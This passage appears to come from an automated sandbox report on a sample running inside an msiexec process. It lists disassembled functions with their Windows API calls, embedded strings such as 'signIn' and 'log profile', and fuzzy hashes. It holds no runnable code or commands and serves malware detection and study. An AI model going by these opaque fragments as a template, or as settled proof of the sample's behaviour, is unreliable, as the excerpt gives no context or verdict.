                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Item$Dialog$MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3975816621-0
                                                                                                        • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                        • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                        • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                        • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                        Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                        • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                                                        • API String ID: 1214746602-2708368587
                                                                                                        • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                        • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                        • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                        • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                        Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                        • memset.MSVCRT ref: 00405E33
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                        • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2313361498-0
                                                                                                        • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                        • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                        • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                        • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                        Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                        • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                          • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                        • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                        • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ItemMessageRectSend$Client
                                                                                                        • String ID:
                                                                                                        • API String ID: 2047574939-0
                                                                                                        • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                        • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                        • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                        • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                        Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                        • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 4218492932-0
                                                                                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                        Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 438689982-4203073231
                                                                                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                        Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                        • API String ID: 3510742995-2446657581
                                                                                                        • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                        • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                        • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                        • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                        Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                        • memset.MSVCRT ref: 00405ABB
                                                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                        • SetFocus.USER32(?), ref: 00405B76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4281309102-0
                                                                                                        • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                        • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                        • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                        • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                        Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscat
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 384018552-4153097237
                                                                                                        • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                        • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                        • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                        • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                        Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                        • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                        • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                        Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                        • memset.MSVCRT ref: 00405455
                                                                                                        • memset.MSVCRT ref: 0040546C
                                                                                                        • memset.MSVCRT ref: 00405483
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy$ErrorLast
                                                                                                        • String ID: 6$\
                                                                                                        • API String ID: 404372293-1284684873
                                                                                                        • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                        • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                        Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesErrorFileLastSleep$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1470729244-0
                                                                                                        • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                        • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                        Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331804452-0
                                                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                        Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                        • String ID: advapi32.dll
                                                                                                        • API String ID: 2012295524-4050573280
                                                                                                        • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                        • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                        • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                        • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                        Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                        • <%s>, xrefs: 004100A6
                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                        Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2521778956-791839006
                                                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                        Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                        • API String ID: 999028693-502967061
                                                                                                        • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                        • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                        Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.MSVCRT ref: 00408DFA
                                                                                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                        • memset.MSVCRT ref: 00408E46
                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2350177629-0
                                                                                                        • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                        • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                        • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                        • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                        Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                        • API String ID: 2221118986-1606337402
                                                                                                        • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                        • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                        • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                        • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
